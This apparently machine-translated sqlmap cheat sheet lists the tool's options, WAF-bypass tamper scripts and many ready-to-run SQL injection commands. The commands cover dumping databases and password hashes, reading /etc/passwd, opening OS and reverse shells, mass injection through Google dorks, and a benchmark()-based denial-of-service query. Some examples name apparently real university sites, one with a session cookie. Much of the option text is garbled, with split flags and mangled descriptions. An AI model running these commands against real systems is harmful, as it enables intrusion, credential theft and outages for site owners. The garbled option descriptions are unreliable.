sqlmap command line parameter translation and common usage

statement

I collected it a long time ago, and recently I have studied the idea of ​​SQL injection, so I posted it for emergencies.

Specific parameter translation

-Version Display the version number of the program and exit
-h, -help Display this help message and exit
-v VERBOSE Detail level: 0-6 (default is 1)
Target (target): The
following need to set at least one of the options, set the target URL .
-d DIRECT connects directly to the database.
-u URL, –url=URL target URL.
-l LIST Parse the target from the logs of Burp or WebScarab agent.
-r REQUESTFILE Load HTTP requests from a file.
-g GOOGLEDORK Process the result of Google dork as the target URL.
-c CONFIGFILE Load options from the INI configuration file.
Request:
These options can be used to specify how to connect to the target URL.
--Data=DATA Data string sent via POST
--cookie=COOKIE HTTP Cookie header
–cookie-urlencode URL encoding generated cookie injection
–drop-set-cookie Ignore the response Set –Cookie header information
–user-agent=AGENT Specify HTTP User –Agent header –random
-agent Use randomly selected HTTP User-Agent header
–referer=REFERER to specify HTTP Referer header
–Headers=HEADERS separate lines and add other HTTP headers
–auth-type=ATYPE HTTP authentication type (Basic, Digest or NTLM) (Basic, Digest or NTLM)
–auth-cred=ACRED HTTP authentication credentials (user name: Password)
–auth-cert=ACERT HTTP authentication certificate (key_file, cert_file)
–proxy=PROXY Use HTTP proxy to connect to the target URL
–proxy-cred=PCRED HTTP proxy authentication credentials (username: password)
–ignore-proxy Ignore the system Lu default HTTP proxy
–delay=DELAY The delay time between each HTTP request, in seconds
–timeout=TIMEOUT Time to wait for connection timeout (default is 30 seconds)
–retries=RETRIES Time to reconnect after connection timeout ( Default 3)
–scope=SCOPE The regular expression to filter the target from the provided proxy log
–safe-url=SAFURL URL address that is frequently visited during the test
–safe-freq=SAFREQ Test request between two visits, Give a safe URL
Optimization (optimization):
These options can be used to optimize the performance of sqlmap.
-o Turn on all optimization switches
–predict-output predict common query output
–keep-alive use persistent HTTP(S) connection
–Null-connection Retrieve the page length from the actual HTTP response body
–threads=THREADS Maximum HTTP(S) request concurrency (default is 1)
Injection:
These options can be used to specify which parameters to test, provided from Defined injection payloads and optional tampering scripts.
-p TESTPARAMETER Testable parameters
–dbms=DBMS force the back-end DBMS to this value
–os=OS force the back-end DBMS operating system to this value
–prefix=PREFIX inject payload string prefix
–suffix=SUFFIX inject payload string suffix
– tamper=TAMPER Use the given script to tamper with the injected data-tamper
bypass the WEB firewall (WAF) by encoding sqlmap defaults to char()-
the directory where the tamper plug-in is located \ sqlmap-dev\tamper
apostrophemask Replace single quote characters with UTF-8 full-width characters
apostrophenullencode replaces single quote characters with illegal double-byte unicode characters
appendnullbyte at the end of the payload adds a null character encoding
base64encode Use Base64 encoding for all characters in the given payload
between, respectively, replace the greater than sign ">", "BETWEEN" with "NOT BETWEEN 0 AND #" # AND #" Replace the equal sign "="
bluecoat replaces the space character with a valid random white space after the SQL statement, and then replaces the equal sign "=" with "LIKE"
chardoubleencode Double URL encoding for all characters of the given payload (does not process the encoded characters)
charencode for the given Use URL encoding for all characters of the payload (do not process encoded characters)
charunicodeencode Use Unicode URL encoding for non-encoded characters of a given payload (do not process encoded characters)
concat2concatws use "CONCAT_WS(MID(CHAR(0), 0) , 0), A, B)” Replace instances like “CONCAT(A, B)”
equaltolike Replace all equal signs with “LIKE” operator “=”
greatest Replace greater than signs “>” with “GREATEST” function
halfversionedmorekeywords at every Add MySQL comment before each keyword
ifnull2ifisnull Replace instance like “IFNULL(A, B)” with "IF(ISNULL(A), B, A)"
lowercase replace each keyword character with lowercase value
modsecurityversioned Enclose the complete comment with comment Query
modsecurityzeroversioned Enclose the complete query with comments with zeros in it.
Multiplespaces Add multiple spaces around SQL keywords
nonrecursivereplacement replaces predefined SQL keywords with representations, applicable to the filter
overlongutf8 Converts all characters
in the given payload percentage Add a percent sign before each character
randomcase Randomly converts the case of each keyword character
randomcomments to SQL key Insert a random comment in the word
securesphere Add a specially constructed string
sp_password Add "sp_password" to the end of the payload for automatic obfuscation from DBMS logs
space2comment Replace the space character with "/**/"
space2dash Use the dash comment character "–" followed by a random Replace the space character
with a string and a newline character space2hash Replace the space character with a pound comment character "#" followed by a random string and a newline character
space2morehash Replace the space character with a pound comment character "#" followed by a random string and a newline character The character
space2mssqlblank replaces the space character
with a random blank character in a valid alternative character set space2mssqlhash replaces the space character with the pound comment character "#" followed by a newline character
space2mysqlblank replaces the blank character with a valid alternative character set Replace the space character
space2mysqldash Use the dash comment character "–" followed by a newline character to replace the space character
space2plus Use the plus sign "+" to replace the space character
space2randomblank replaces the space character
with a random blank character from a valid alternative character set unionalltounion replaces "UNION ALL SELECT" with "UNION SELECT" unmagicquotes replaces the space character
with a multi-byte combination %bf%27 and the general comment at the end
varnish Add a HTTP header "X-originating-IP" to bypass WAF
versionedkeywords Surround each non-function keyword
with MySQL comments versionedmorekeywords Surround each keyword with MySQL comments
xforwardedfor Add a fake HTTP header "X-Forwarded-For" to Bypass WAF
Detection (detection):
These options can be used to specify how to parse and compare the content of the HTTP response page during blind SQL injection.
–Level=LEVEL The level at which the test is performed (1-5, default is 1)
–risk=RISK is the risk of performing the test (0-3, default is 1)
–string=STRING Match string on the page when the query is valid
–regexp=REGEXP Match the regular expression on the page when the query is valid
–text-only Compare web pages based on text content only
These options can be used to adjust specific SQL injection tests.
--Technique=TECH SQL injection technology test (default BEUST)
Techniques:
--Technique /* Test the specified injection type\Technology used
Without parameters, all injection technologies are tested by default:
B: Boolean-based blind SQL injection
E: Error-based SQL injection
U: UNION-based injection
S: Stacked SQL injection
T: Based on Time blind note
–time-sec=TIMESEC DBMS response delay time (default is 5 seconds)
–union-cols=UCOLS fixed column range is used to test UNION query injection
–union-char=UCHAR is used to brute force the character to guess the number of columns
Fingerprint (fingerprint):
-f, -fingerprint performs a wide range of DBMS version fingerprints
Enumeration (enumeration):
These options can be used to enumerate the back-end database management system information, table structure and data. In addition, you can also run your own SQL statements.
-b, -banner retrieval database management system identification
-current-user database management system to retrieve the current user
in the current database -current-db retrieval database management system
-is-dba DBMS detecting the current user is the DBA
-users enumerate a database management system users
- passwords enumerate the password hash of
database management system users-privileges
enumerate the permissions of database management system users-roles enumerate the roles of database management system users
–Dbs enumerate database management system databases
–tables enumerate DBMS database tables
–columns enumerate DBMS database table columns
–dump dump entries in the database management system database
–dump-all dump all DBMS database tables Entry-
search search column, table and/or database name-
D DB database name to be enumerated-
T TBL database table
to be enumerated-C COL database column to be enumerated-
U USER for enumeration
Excluded database users –exclude-sysdbs Exclude system databases when enumerating tables
–start=LIMITSTART The output of the first query enters the search
–stop=LIMITSTOP The output of the last query enters the search
–first=FIRSTCHAR The character search of the first query output word
– last=LASTCHAR The output character search of the last query –sql
-query=QUERY SQL statement to be executed
–sql-shell prompt interactive SQL shell
Brute force (brute force):
These options can be used to run brute force checks.
–Common-tables check that there is a common table
–common-columns check that there is a common column
User-defined function injection (user-defined function injection):
These options can be used to create user-defined functions.
–Udf-inject injects user-defined functions
–shared-lib=SHLIB The local path of the shared library
File system access:
these options can be used to access the underlying file system of the back-end database management system.
--File-read=RFILE reads files from the back-end database management system file system
--file-write=WFILE edits the local files on the back-end database management system file system
--file-dest=DFILE the back-end database management system writes files Absolute path
Operating system access (operating system access):
These options can be used to access the underlying operating system of the back-end database management system.
–Os-cmd=OSCMD execute operating system commands
–os-shell interactive operating system shell
–os-pwn get an OOB shell, meterpreter or VNC
–os-smbrelay get an OOB shell, meterpreter or VNC
–os- Buffer overflow of bof stored procedure use
–priv-esc database process user privilege promotion
–msf-path=MSFPATH Metasploit Framework local installation path
–tmp-path=TMPPATH absolute path of the remote temporary file directory
Windows registry access:
These options can be used to access the Windows registry of the back-end database management system.
–Reg-read read a Windows registry key value
–reg-add write a Windows registry key value data
–reg-del delete a Windows registry key value
–reg-key=REGKEY Windows registry key
–reg-value=REGVAL Windows Registry Key Value
–reg-data=REGDATA Windows Registry Key Value Data
–reg-type=REGTYPE Windows Registry Key Value Type
General (General):
These options can be used to set some general working parameters.
-t TRAFFICFILE Record all HTTP traffic to a text file
-s SESSIONFILE Save and restore all data of the retrieved session file
-flush-session Refresh the current target session file
-fresh-queries Ignore the query results stored in the session file
-eta display Estimated arrival time of each output
-update Update SqlMap
-save file Save options to INI configuration file
-batch never ask for user input, use all default configurations.
Miscellaneous (Miscellaneous):
–beep reminds when SQL injection is found
–check-payload IDS detection test for injected payloads
–Cleanup sqlmap Specific UDF and table cleaning DBMS
–forms parse and test form of target URL
–gpage=GOOGLEPAGE Use Google dork result from specified page number
–page-rank Google dork result shows page rank (PR)
–parse-errors from Respond to the error message of the page analysis database management system
-replicate Copy the dumped data to a sqlite3 database
-tor Use the default Tor (Vidalia/Privoxy/Polipo) proxy address
-wizard Simple wizard interface for novice users

Basic usage

sqlmap sqlmap -u "http://www.xxx.com" // check if there is injection, some basic information
sqlmap -u "http://www.xxx.com" --dbs // enumerate database
sqlmap sqlmap- u "http://www.xxx.com" --tables // table name enumeration
sqlmap sqlmap -u "http://www.xxx.com" --columns -T database table name // field enumeration
sqlmap sqlmap -u "http://www.xxx.com" --dump -T database table name -C "field 1, field 2, field 3" //dump
sqlmap -u "http://www.xxx.com "--Dump -D database name-T table name-C "field name 1, field name 2, field name 3" //dump
read the database —> read the table —-> read the column of the table —-> get Content
sqlmap -u "http://jxpt.cuit.edu.cn/meol/common/inform/message_content.jsp?nid=419205" -p "nid" --cookie "JSESSIONID=EC114ABC4B90D3CB1FC79874ABB5E9C6"//cookie injection
sqlmap- u http://xxx.xxx.com/Login.asp --data "n=1&p=1" //post injection
sqlmap -r "package file path" -p injection point //You can save the http package as a txt file You can test multiple post injection points
sqlmap -u injection point --current-user # /*get current user name
sqlmap -u injection point --current-db # /*get current database name
sqlmap -u injection point -D "database name" -T "table name "--Tables
sqlmap -u injection point -D "database name" -T "table name" --columns
sqlmap -u injection point -D "database name" -T "table name" -C "field" --dump
sqlmap -u injection point --file-read "file name"# read file load_file()
sqlmap -u injection point --is-dba #whether it is a database administrator
sqlmap -u injection point --passwords
#database user password sqlmap- u Injection point --current-user # /*Get the current user name

Primary usage

sqlmap -u "http://url/news?id=1" –dbs / What database query is
sqlmap -u "http://url/news?id=1" –current-db / Get the current database name
sqlmap- u "http://url/news?id=1" –current-user / Get the current user name
sqlmap -u "http://url/news?id=1" -D DataName –tables / Get the table of the DataName database
sqlmap -u “http://url/news?id=1” –columns -T “tablename” users-D “db_name” -v 0 /* Column field
sqlmap -u “http://url/news?id= 1" -D DataName -T TableNamen -C "admin,password" -dump -v 0 / Get field data
sqlmap -u "http://url/news?id=1" -dbms "Mysql" / Specify database type
sqlmap -u “http://url/news?id=1” –users / list database user
sqlmap -u “http://url/news?id=1” –passwords / get database user password
sqlmap -u “http: //url/news?id=1” –passwords -U root -v 0 / List the specified user database password
sqlmap -u “http://url/news?id=1” –dump -C “password,user,id” -T “tablename” -D “db_name” –start 1 –stop 20 / List specified fields, columns
Generate 20 sqlmap -u "http://url/news?id=1" –dump-all -v 0 / List all tables in all databases
sqlmap -u "http://url/news?id=1" – privileges / View permissions
sqlmap -u "http://url/news?id=1" –privileges -U root / View specific user permissions
sqlmap -u "http://url/news?id=1" –is-dba -v 1 / Is it a database administrator
sqlmap -u "http://url/news?id=1" –roles / Enumerate database user roles
sqlmap -u "http://url/news?id=1" – udf-inject / Import user-defined functions (get system permissions!)
sqlmap -u "http://url/news?id=1" –dump-all –exclude-sysdbs -v 0 / List all tables in the current library
sqlmap -u “http://url/news?id=1” –union-cols /union query table record
sqlmap -u “http://url/news?id=1” –cookie “COOKIE_VALUE” /cookie injection
sqlmap -u "http://url/news?id=1" -b(–banner) / Get banner information
sqlmap -u "http://url/news?id=1" –data "id=3" / Post injection
sqlmap -u "http://url/news?id=1" -v 1 -f / Fingerprint discrimination database type
sqlmap -u "http://url/news?id=1" –proxy "http:/ /127.0.0.1:8118" / Proxy injection
sqlmap -u "http://url/news?id=1" –string "STRING_ON_TRUE_PAGE" / Specify keyword
sqlmap -u "http://url/news?id=1 "-Sql-shell / execute the specified sql command
sqlmap -u "http://url/news?id=1" -file /etc/passwd
sqlmap -u "http://url/news?id=1" -os -cmd=whoami / execute the system command
sqlmap -u "http://url/news?id=1" –os-shell / system interactive shell
sqlmap -u "http://url/news?id=1" –os -pwn / Reverse shell
sqlmap -u "http://url/news?id=1" –reg-read / read the win system registry
sqlmap -u "http://url/news?id=1" –dbs -o "sqlmap.log"/ save progress
sqlmap -u “http://url/news?id=1” –dbs -o “sqlmap.log” –resume /* Resume the saved progress

---

Advanced usage

Form

Form enum

sqlmap -u “http://www.xxx.com” --forms

Specify form data

sqlmap -u "http://www.xxx.com" --data "tfUName=1&UPass=1"
burpsuite capture and construct request request
sqlmap -r search_test -p tfUPass

Interactive shell

sqlmap -u "http://www.xxx.com" --os-cmd "ipconfig"
sqlmap -u "http://www.xxx.com" --os-shell
sqlmap -u "http://www .xxx.com" --os-pwn
sqlmap -u "http://www.xxx.com" --sql-shell
php Provide upload page, use shell to increase rights.

Pseudo-static injection

"Http://sfl.fzu.edu.cn/index.php/Index/view/id/40.html"
sqlmap -u "http://sfl.fzu.edu.cn/index.php/Index/view /id/40*.html"
google hacking
-p name / Multiple parameters such as index.php?n_id=1&name=2&data=2020 We want to specify the name parameter to inject
sqlmap -g "site:xxxxx.com inurl:php?id =" –dump-all –batch /google search injection points automatically run out of all fields, and you need to ensure that google.com can be accessed normally

DoS Attack

Execute in the sql shell
Use specific sql to cause the database to report an error and stop running
select benchmark (99999999999, 0x70726f62616e646f70726f62616e646f70726f62616e646f)

WAF bypass

–batch Never ask for user input, use the default behaviour
–tamper=TAMPER Use given script(s) for tampering injection data
常见 encoder: space2hash, space2morehash, base64encode, charencode
示例
sqlmap -u “http://www.xxx.com” -v 3 --dbs --batch --tamper “space2hash”

Permission view

–privileges Enumerate DBMS users privileges
示例
sqlmap -u “http://www.xxx.com” --privileges